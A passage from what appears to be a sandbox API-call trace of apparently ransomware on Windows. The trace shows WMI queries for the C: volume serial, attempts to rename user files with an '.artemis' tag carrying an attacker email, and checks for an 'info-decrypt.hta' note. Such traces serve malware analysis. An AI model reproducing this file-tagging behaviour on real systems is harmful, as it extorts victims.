Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0161.786] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x780b64) returned 0x0 [0161.786] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0161.786] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0161.786] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0161.786] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0161.786] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x780bec) returned 0x0 [0161.786] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0161.786] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0161.786] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0161.786] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0161.786] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0161.786] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x672cc94) returned 0x0 [0161.787] WbemLocator:IUnknown:AddRef (This=0x672cc94) returned 0x4 [0161.787] WbemLocator:IUnknown:Release (This=0x672cc94) returned 0x3 [0161.787] WbemLocator:IUnknown:Release (This=0x672cc94) returned 0x2 [0161.787] SysStringLen (param_1=0x0) returned 0x0 [0161.787] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0161.787] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0161.787] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.787] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0161.787] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0161.787] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x780c04) returned 0x0 [0161.787] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0161.787] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0161.787] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0161.787] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0161.787] IWbemServices:GetObject (in: This=0x672cc94, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673b600, ppCallResult=0x0) returned 0x0 [0166.597] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0166.597] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0166.597] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.597] IWbemClassObject:Get (in: This=0x673b600, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x356c060*=0, plFlavor=0x356c064*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x356c060*=8, plFlavor=0x356c064*=0) returned 0x0 [0166.597] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.597] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.597] IWbemClassObject:Get (in: This=0x673b600, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x356c060*=8, plFlavor=0x356c064*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x356c060*=8, plFlavor=0x356c064*=0) returned 0x0 [0166.597] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.597] SysStringByteLen (bstr="9C354B42") returned 0x10 [0166.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1", lpFilePart=0x0) returned 0x2d [0166.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x58 [0166.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0166.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000)) returned 1 [0166.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0166.598] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0166.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpFilePart=0x0) returned 0x2d [0166.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpFilePart=0x0) returned 0x2d [0166.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0166.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0166.599] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62089c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x62089c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x622eb20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0166.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0166.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpFilePart=0x0) returned 0x2d [0166.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0166.599] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), fInfoLevelId=0x0, lpFileInformation=0x356c7ac | out: lpFileInformation=0x356c7ac*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0166.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0166.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpFilePart=0x0) returned 0x2d [0166.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0166.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0166.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfe0) returned 1 [0166.601] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0166.601] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0166.601] CoTaskMemFree (pv=0x7b3f80) [0166.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0166.601] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0166.601] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0166.601] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0166.601] IUnknown:Release (This=0x72015c) returned 0x1 [0166.602] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x67370e8) returned 0x0 [0166.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370e8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0166.602] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370e8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x6738bd0) returned 0x0 [0166.602] WbemDefPath:IUnknown:Release (This=0x67370e8) returned 0x0 [0166.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x6738bd0) returned 0x0 [0166.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0166.602] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0166.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0166.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0166.602] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x7ae6a0) returned 0x0 [0166.603] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae6a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0166.603] WbemDefPath:IUnknown:Release (This=0x7ae6a0) returned 0x3 [0166.603] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0166.603] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0166.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0166.603] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0166.603] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0166.603] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0166.603] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0166.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738bd0, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x6738bd0) returned 0x0 [0166.603] WbemDefPath:IUnknown:AddRef (This=0x6738bd0) returned 0x3 [0166.603] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x2 [0166.603] WbemDefPath:IWbemPath:SetText (This=0x6738bd0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738bd0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738bd0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738bd0, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0166.603] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.603] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0166.603] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0166.604] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0166.604] IUnknown:Release (This=0x72015c) returned 0x1 [0166.604] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea80 | out: ppv=0x71eea80*=0x6737108) returned 0x0 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737108, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eec98 | out: ppvObject=0x71eec98*=0x0) returned 0x80004002 [0166.605] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737108, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecac | out: ppvObject=0x71eecac*=0x6738c40) returned 0x0 [0166.605] WbemDefPath:IUnknown:Release (This=0x6737108) returned 0x0 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8cc | out: ppvObject=0x71ee8cc*=0x6738c40) returned 0x0 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee888 | out: ppvObject=0x71ee888*=0x0) returned 0x80004002 [0166.605] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1e4 | out: ppvObject=0x71ee1e4*=0x0) returned 0x80004002 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee194 | out: ppvObject=0x71ee194*=0x0) returned 0x80004002 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1a0 | out: ppvObject=0x71ee1a0*=0x7ae590) returned 0x0 [0166.605] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae590, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1a8 | out: pCid=0x71ee1a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0166.605] WbemDefPath:IUnknown:Release (This=0x7ae590) returned 0x3 [0166.605] CoGetContextToken (in: pToken=0x71ee200 | out: pToken=0x71ee200) returned 0x0 [0166.605] CoGetContextToken (in: pToken=0x71ee608 | out: pToken=0x71ee608) returned 0x0 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee698 | out: ppvObject=0x71ee698*=0x0) returned 0x80004002 [0166.605] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0166.605] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0166.605] CoGetContextToken (in: pToken=0x71eef90 | out: pToken=0x71eef90) returned 0x0 [0166.605] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0166.605] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x71eefc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefbc | out: ppvObject=0x71eefbc*=0x6738c40) returned 0x0 [0166.606] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0166.606] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0166.606] WbemDefPath:IWbemPath:SetText (This=0x6738c40, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0166.606] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x71ef140 | out: 